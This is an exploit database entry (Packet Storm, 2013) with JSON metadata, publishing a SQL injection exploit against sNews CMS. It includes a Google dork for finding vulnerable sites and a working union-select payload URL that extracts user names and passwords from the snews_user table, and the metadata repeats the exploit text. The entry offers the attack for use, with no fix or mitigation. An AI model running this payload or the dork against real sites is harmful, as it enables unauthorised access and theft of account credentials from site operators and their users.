ID PACKETSTORM:119573
Type packetstorm
Reporter By onestree
Modified 2013-01-15T00:00:00
Description
`
# Exploit Title : CMS snews SQL Injection Vulnerability
# Author : By onestree
# Software Link : http://snewscms.com/
# tested : ubuntu 12.10 / win 7
# Dork : inurl:"tanyakan pada rumput yang bergoyang"
*************************************************************
SQL poc:
http://localhost/snews/snews.php?act=shownews&id=[SQL]
Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
Thanks :
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
special my hunny :*
`
{"hash": "280d426cab4da0bc9e03b6c290d8846032a4dbb8b883a24ca5e7c9fbc2ed7b08", "sourceHref": "https://packetstormsecurity.com/files/download/119573/cmssnews-sql.txt", "title": "Snews CMS SQL Injection", "id": "PACKETSTORM:119573", "published": "2013-01-15T00:00:00", "description": "", "modified": "2013-01-15T00:00:00", "sourceData": "` \n \n____ ____ ____ _______/ |________ ____ ____ \n/ _ \\ / \\_/ __ \\ / ___/\\ __\\_ __ \\_/ __ \\_/ __ \\ \n( <_> ) | \\ ___/ \\___ \\ | | | | \\/\\ ___/\\ ___/ \n\\____/|___| /\\___ >____ > |_ | |__| \\___ >\\___ > \n\\/ \\/ \\/ \\/ \\/ \n \n \n# Exploit Title : CMS snews SQL Injection Vulnerability \n# Author : By onestree \n# Software Link : http://snewscms.com/ \n# tested : ubuntu 12.10 / win 7 \n# Dork : inurl:\"tanyakan pada rumput yang bergoyang\" \n \n \n************************************************************* \n \nSQL poc: \n \nhttp://localhost/snews/snews.php?act=shownews&id=[SQL] \n \nExample: \n \nhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* \n \n \nThanks : \n \nExploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell \n \nindonesiancoder - moeslimh4x0r - go-coder \n \nspesial my hunny :* \n`\n", "reporter": "By onestree", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "9dff942b56f4542ceed78dc8bfd9cc66"}, {"key": "modified", "hash": "4fe7dc76b88259d2e72ed2c00f85eeae"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "4fe7dc76b88259d2e72ed2c00f85eeae"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": 
"d1d49769a134b0c492751349b107673f"}, {"key": "sourceData", "hash": "74786401f71ef579b62bdbc65f8c8f80"}, {"key": "sourceHref", "hash": "61aba19537d747335e05bb7f0f0ceb95"}, {"key": "title", "hash": "36c91ed2ce27411879242c74d64f5652"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/119573/Snews-CMS-SQL-Injection.html", "lastseen": "2016-11-03T10:16:28", "viewCount": 0, "enchantments": {"vulnersScore": 9.0}}
{"result": {}}